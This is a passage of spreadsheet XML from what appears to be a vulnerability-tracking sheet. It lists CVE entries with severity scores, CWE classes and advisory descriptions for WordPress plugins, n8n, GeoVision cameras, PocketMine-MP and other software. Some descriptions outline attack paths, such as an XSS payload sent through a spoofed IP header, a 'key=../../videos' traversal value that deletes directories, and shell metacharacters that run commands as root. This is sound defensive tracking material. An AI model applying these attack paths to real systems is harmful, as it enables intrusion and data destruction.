      <c r="E3051" s="5" t="inlineStr"/>
      <c r="F3051" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3051" s="5" t="inlineStr"/>
      <c r="H3051" s="5" t="inlineStr"/>
      <c r="I3051" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3051" s="5" t="inlineStr"/>
      <c r="K3051" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3051" s="5" t="inlineStr">
        <is>
          <t>The Contact Form by Supsystic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via IP Address Header in all versions up to, and including, 1.10.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. An unauthenticated attacker can first call the 'updateNonce' action — which is accessible without authentication due to its absence from the plugin's permission list — to obtain a valid nonce, then submit a contact form with a malicious payload in a spoofed IP header such as X-Forwarded-For.</t>
        </is>
      </c>
      <c r="M3051" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83625</t>
        </is>
      </c>
    </row>
    <row r="3052">
      <c r="A3052" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3052" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84293</t>
        </is>
      </c>
      <c r="C3052" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3052" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3052" s="5" t="inlineStr"/>
      <c r="F3052" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3052" s="5" t="inlineStr"/>
      <c r="H3052" s="5" t="inlineStr"/>
      <c r="I3052" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3052" s="5" t="inlineStr"/>
      <c r="K3052" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3052" s="5" t="inlineStr">
        <is>
          <t>The Repeater Fields for Gravity Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Repeated Multi-Input Sub-Field Values in all versions up to, and including, 3.0.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This vulnerability only affects multi-input sub-field types within a repeater (such as Name, Address, and Checkbox fields), as scalar single-input field values are escaped with esc_html() at the output stage in version 3.0.4.</t>
        </is>
      </c>
      <c r="M3052" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84293</t>
        </is>
      </c>
    </row>
    <row r="3053">
      <c r="A3053" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3053" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84387</t>
        </is>
      </c>
      <c r="C3053" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3053" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3053" s="5" t="inlineStr"/>
      <c r="F3053" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G3053" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H3053" s="5" t="inlineStr"/>
      <c r="I3053" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3053" s="5" t="inlineStr"/>
      <c r="K3053" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L3053" s="5" t="inlineStr">
        <is>
          <t>A improper neutralization of special elements used in a command ('command injection') vulnerability in Fortinet FortiSandbox 5.2.0, FortiSandbox 5.0.0 through 5.0.6, FortiSandbox 4.4.0 through 4.4.9 may allow attacker to execute unauthorized code or commands via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="M3053" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84387</t>
        </is>
      </c>
    </row>
    <row r="3054">
      <c r="A3054" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3054" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85160</t>
        </is>
      </c>
      <c r="C3054" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3054" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3054" s="5" t="inlineStr"/>
      <c r="F3054" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3054" s="5" t="inlineStr"/>
      <c r="H3054" s="5" t="inlineStr"/>
      <c r="I3054" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3054" s="5" t="inlineStr"/>
      <c r="K3054" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L3054" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c91b5975d contains a cross-site request forgery and path traversal vulnerability in stopLive.php that allows attackers to delete directories by exploiting missing token validation and unsanitized key parameter concatenation. Attackers can craft an image tag with a traversal payload like key=../../videos to trigger recursive deletion of the videos directory when an admin visits a malicious page.</t>
        </is>
      </c>
      <c r="M3054" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85160</t>
        </is>
      </c>
    </row>
    <row r="3055">
      <c r="A3055" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3055" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85165</t>
        </is>
      </c>
      <c r="C3055" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3055" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3055" s="5" t="inlineStr"/>
      <c r="F3055" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3055" s="5" t="inlineStr"/>
      <c r="H3055" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="I3055" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3055" s="5" t="inlineStr"/>
      <c r="K3055" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L3055" s="5" t="inlineStr">
        <is>
          <t>n8n versions before 2.36.2 contain an expression sandbox bypass vulnerability where free identifiers in spread, computed-key, switch-case, or class-extension positions resolve against process globals. Authenticated users with workflow-edit permission can mutate host objects through expression evaluation, with changes persisting process-wide until restart.</t>
        </is>
      </c>
      <c r="M3055" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85165</t>
        </is>
      </c>
    </row>
    <row r="3056">
      <c r="A3056" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3056" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85166</t>
        </is>
      </c>
      <c r="C3056" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3056" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3056" s="5" t="inlineStr"/>
      <c r="F3056" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3056" s="5" t="inlineStr"/>
      <c r="H3056" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="I3056" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3056" s="5" t="inlineStr"/>
      <c r="K3056" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3056" s="5" t="inlineStr">
        <is>
          <t>n8n before 2.35.4 and 2.36.x before 2.36.2 does not validate credential references in the inline workflow JSON of nodes that execute an inline sub-workflow (e.g., the Workflow Tool node). A shared-workflow editor, or any user creating/updating a workflow via the REST API, Public API, or MCP, can persist a node referencing a credential they do not own. When the workflow is later executed under an identity that holds the credential, the inline sub-workflow resolves the secret and can send it to an attacker-controlled endpoint, resulting in credential exfiltration.</t>
        </is>
      </c>
      <c r="M3056" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85166</t>
        </is>
      </c>
    </row>
    <row r="3057">
      <c r="A3057" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3057" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85213</t>
        </is>
      </c>
      <c r="C3057" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3057" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3057" s="5" t="inlineStr"/>
      <c r="F3057" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3057" s="5" t="inlineStr"/>
      <c r="H3057" s="5" t="inlineStr"/>
      <c r="I3057" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3057" s="5" t="inlineStr"/>
      <c r="K3057" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3057" s="5" t="inlineStr">
        <is>
          <t>Kill Bill through 0.24.21 fails to enforce permission annotations on several AdminResource endpoints including getQueueEntries, invalidatesCache, and putOutOfRotation. Authenticated users with minimal account:read permissions can read internal queues, flush server caches, and disable the server by putting the host out of rotation.</t>
        </is>
      </c>
      <c r="M3057" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85213</t>
        </is>
      </c>
    </row>
    <row r="3058">
      <c r="A3058" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3058" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85214</t>
        </is>
      </c>
      <c r="C3058" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3058" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3058" s="5" t="inlineStr"/>
      <c r="F3058" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3058" s="5" t="inlineStr"/>
      <c r="H3058" s="5" t="inlineStr"/>
      <c r="I3058" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3058" s="5" t="inlineStr"/>
      <c r="K3058" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3058" s="5" t="inlineStr">
        <is>
          <t>vhr fails to validate user authorization in the PUT /hr/info endpoint, allowing authenticated users to modify arbitrary HR profiles by supplying any profile ID in the request body. Attackers can overwrite other users' names, addresses, and disable accounts including administrators to cause denial of service.</t>
        </is>
      </c>
      <c r="M3058" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85214</t>
        </is>
      </c>
    </row>
    <row r="3059">
      <c r="A3059" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3059" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86541</t>
        </is>
      </c>
      <c r="C3059" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3059" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3059" s="5" t="inlineStr"/>
      <c r="F3059" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3059" s="5" t="inlineStr"/>
      <c r="H3059" s="5" t="inlineStr"/>
      <c r="I3059" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3059" s="5" t="inlineStr"/>
      <c r="K3059" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3059" s="5" t="inlineStr">
        <is>
          <t>knowns versions before 0.30.0 contain a path traversal vulnerability in the handleCodeReplace() function that allows attackers to overwrite arbitrary files outside the project root. Attackers can supply absolute paths or relative paths containing directory traversal sequences to write malicious content to sensitive files like shell startup scripts or SSH configuration files.</t>
        </is>
      </c>
      <c r="M3059" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86541</t>
        </is>
      </c>
    </row>
    <row r="3060">
      <c r="A3060" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3060" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86544</t>
        </is>
      </c>
      <c r="C3060" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3060" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3060" s="5" t="inlineStr"/>
      <c r="F3060" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3060" s="5" t="inlineStr"/>
      <c r="H3060" s="5" t="inlineStr"/>
      <c r="I3060" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3060" s="5" t="inlineStr"/>
      <c r="K3060" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3060" s="5" t="inlineStr">
        <is>
          <t>knowns versions before 0.30.0 contain an authorization bypass vulnerability where mutating code actions are incorrectly classified as read-only operations. Attackers with read-restricted sessions can exploit code.replace to modify permission configurations and escalate privileges on subsequent calls.</t>
        </is>
      </c>
      <c r="M3060" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86544</t>
        </is>
      </c>
    </row>
    <row r="3061">
      <c r="A3061" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3061" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87021</t>
        </is>
      </c>
      <c r="C3061" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3061" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3061" s="5" t="inlineStr"/>
      <c r="F3061" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3061" s="5" t="inlineStr"/>
      <c r="H3061" s="5" t="inlineStr"/>
      <c r="I3061" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3061" s="5" t="inlineStr"/>
      <c r="K3061" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L3061" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an unauthorized code execution vulnerability in Comply.</t>
        </is>
      </c>
      <c r="M3061" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87021</t>
        </is>
      </c>
    </row>
    <row r="3062">
      <c r="A3062" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3062" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88272</t>
        </is>
      </c>
      <c r="C3062" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3062" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3062" s="5" t="inlineStr"/>
      <c r="F3062" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3062" s="5" t="inlineStr"/>
      <c r="H3062" s="5" t="inlineStr"/>
      <c r="I3062" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3062" s="5" t="inlineStr"/>
      <c r="K3062" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3062" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 allows an administrator-controlled username containing shell metacharacters to be executed as arbitrary root commands when the stored username is later deleted.</t>
        </is>
      </c>
      <c r="M3062" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88272</t>
        </is>
      </c>
    </row>
    <row r="3063">
      <c r="A3063" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3063" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88273</t>
        </is>
      </c>
      <c r="C3063" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3063" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3063" s="5" t="inlineStr"/>
      <c r="F3063" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3063" s="5" t="inlineStr"/>
      <c r="H3063" s="5" t="inlineStr"/>
      <c r="I3063" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3063" s="5" t="inlineStr"/>
      <c r="K3063" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3063" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 allows an administrator-controlled PPPoE username to escape a sourced shell configuration assignment and execute arbitrary commands as root.</t>
        </is>
      </c>
      <c r="M3063" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88273</t>
        </is>
      </c>
    </row>
    <row r="3064">
      <c r="A3064" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3064" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88274</t>
        </is>
      </c>
      <c r="C3064" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3064" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3064" s="5" t="inlineStr"/>
      <c r="F3064" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3064" s="5" t="inlineStr"/>
      <c r="H3064" s="5" t="inlineStr"/>
      <c r="I3064" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3064" s="5" t="inlineStr"/>
      <c r="K3064" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3064" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 allows an administrator-controlled wireless SSID containing shell syntax to execute arbitrary commands as root.</t>
        </is>
      </c>
      <c r="M3064" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88274</t>
        </is>
      </c>
    </row>
    <row r="3065">
      <c r="A3065" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3065" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88275</t>
        </is>
      </c>
      <c r="C3065" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3065" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3065" s="5" t="inlineStr"/>
      <c r="F3065" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3065" s="5" t="inlineStr"/>
      <c r="H3065" s="5" t="inlineStr"/>
      <c r="I3065" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3065" s="5" t="inlineStr"/>
      <c r="K3065" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3065" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 allows an administrator-controlled WPA-PSK containing shell syntax to execute arbitrary commands as root when wireless configuration is applied.</t>
        </is>
      </c>
      <c r="M3065" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88275</t>
        </is>
      </c>
    </row>
    <row r="3066">
      <c r="A3066" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3066" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88276</t>
        </is>
      </c>
      <c r="C3066" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3066" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3066" s="5" t="inlineStr"/>
      <c r="F3066" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3066" s="5" t="inlineStr"/>
      <c r="H3066" s="5" t="inlineStr"/>
      <c r="I3066" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3066" s="5" t="inlineStr"/>
      <c r="K3066" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3066" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 allows administrator-controlled WEP key values containing shell syntax to execute arbitrary commands as root.</t>
        </is>
      </c>
      <c r="M3066" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88276</t>
        </is>
      </c>
    </row>
    <row r="3067">
      <c r="A3067" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3067" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88282</t>
        </is>
      </c>
      <c r="C3067" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3067" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3067" s="5" t="inlineStr"/>
      <c r="F3067" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3067" s="5" t="inlineStr"/>
      <c r="H3067" s="5" t="inlineStr"/>
      <c r="I3067" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3067" s="5" t="inlineStr"/>
      <c r="K3067" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3067" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 allows an administrator-controlled FTP username containing shell metacharacters to be executed as arbitrary root commands during a subsequent FTP-account update.</t>
        </is>
      </c>
      <c r="M3067" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88282</t>
        </is>
      </c>
    </row>
    <row r="3068">
      <c r="A3068" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3068" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88891</t>
        </is>
      </c>
      <c r="C3068" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3068" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3068" s="5" t="inlineStr"/>
      <c r="F3068" s="5" t="inlineStr"/>
      <c r="G3068" s="5" t="inlineStr"/>
      <c r="H3068" s="5" t="inlineStr"/>
      <c r="I3068" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3068" s="5" t="inlineStr"/>
      <c r="K3068" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L3068" s="5" t="inlineStr">
        <is>
          <t>OpenPanel fails to enforce read-only project access level on 26 of 29 mutating procedures, allowing read-level members to modify, delete, and publish project data. Attackers with explicit read-only access can delete reports and dashboards, schedule entire projects for deletion, publish private analytics to public share links, and modify alerting rules by exploiting missing access level validation in mutation resolvers.</t>
        </is>
      </c>
      <c r="M3068" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88891</t>
        </is>
      </c>
    </row>
    <row r="3069">
      <c r="A3069" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3069" s="5" t="inlineStr">
        <is>
          <t>CVE-2020-37277</t>
        </is>
      </c>
      <c r="C3069" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3069" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3069" s="5" t="inlineStr"/>
      <c r="F3069" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3069" s="5" t="inlineStr"/>
      <c r="H3069" s="5" t="inlineStr"/>
      <c r="I3069" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J3069" s="5" t="inlineStr"/>
      <c r="K3069" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L3069" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 3.15.4 contain a denial of service vulnerability in the InventoryTransaction component's findResultItem() method. Malicious clients can send specially crafted InventoryTransactionPackets with multiple conflicting pathways to cause exponential processing complexity, freezing the server.</t>
        </is>
      </c>
      <c r="M3069" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2020-37277</t>
        </is>
      </c>
    </row>
    <row r="3070">
      <c r="A3070" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3070" s="5" t="inlineStr">
        <is>
          <t>CVE-2021-48007</t>
        </is>
      </c>
      <c r="C3070" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3070" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3070" s="5" t="inlineStr"/>
      <c r="F3070" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3070" s="5" t="inlineStr"/>
      <c r="H3070" s="5" t="inlineStr"/>
      <c r="I3070" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J3070" s="5" t="inlineStr"/>
      <c r="K3070" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L3070" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 3.18.1 fail to validate NaN or INF values in MovePlayerPacket position and rotation fields. Malicious clients can send crafted movement packets with invalid floating-point values to crash servers through unhandled mathematical operations or prevent clients from rendering other players.</t>
        </is>
      </c>
      <c r="M3070" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2021-48007</t>
        </is>
      </c>
    </row>
    <row r="3071">
      <c r="A3071" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3071" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-35499</t>
        </is>
      </c>
      <c r="C3071" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3071" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3071" s="5" t="inlineStr"/>
      <c r="F3071" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3071" s="5" t="inlineStr"/>
      <c r="H3071" s="5" t="inlineStr"/>
      <c r="I3071" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3071" s="5" t="inlineStr"/>
      <c r="K3071" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3071" s="5" t="inlineStr">
        <is>
          <t>In Trimble TM4WEB 21.4.0.4, the external bill viewer endpoint is vulnerable to reflected cross-site scripting via injection in a arbitrary parameter appended to the URL.</t>
        </is>
      </c>
      <c r="M3071" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-35499</t>
        </is>
      </c>
    </row>
    <row r="3072">
      <c r="A3072" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3072" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-51010</t>
        </is>
      </c>
      <c r="C3072" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3072" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3072" s="5" t="inlineStr"/>
      <c r="F3072" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3072" s="5" t="inlineStr"/>
      <c r="H3072" s="5" t="inlineStr"/>
      <c r="I3072" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3072" s="5" t="inlineStr"/>
      <c r="K3072" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L3072" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 4.4.2 fail to properly validate item IDs received from clients in itemstack NBT data. Attackers can send crafted item IDs outside the valid range to trigger an uncaught exception that crashes the server.</t>
        </is>
      </c>
      <c r="M3072" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-51010</t>
        </is>
      </c>
    </row>
    <row r="3073">
      <c r="A3073" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3073" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-51012</t>
        </is>
      </c>
      <c r="C3073" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3073" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3073" s="5" t="inlineStr"/>
      <c r="F3073" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3073" s="5" t="inlineStr"/>
      <c r="H3073" s="5" t="inlineStr"/>
      <c r="I3073" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3073" s="5" t="inlineStr"/>
      <c r="K3073" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L3073" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 4.2.9 fail to properly validate NBT data types during deserialization of inventory transaction packets from clients. Attackers can send crafted inventory transactions with malformed NBT tags to trigger server crashes and cause denial of service.</t>
        </is>
      </c>
      <c r="M3073" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-51012</t>
        </is>
      </c>
    </row>
    <row r="3074">
      <c r="A3074" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
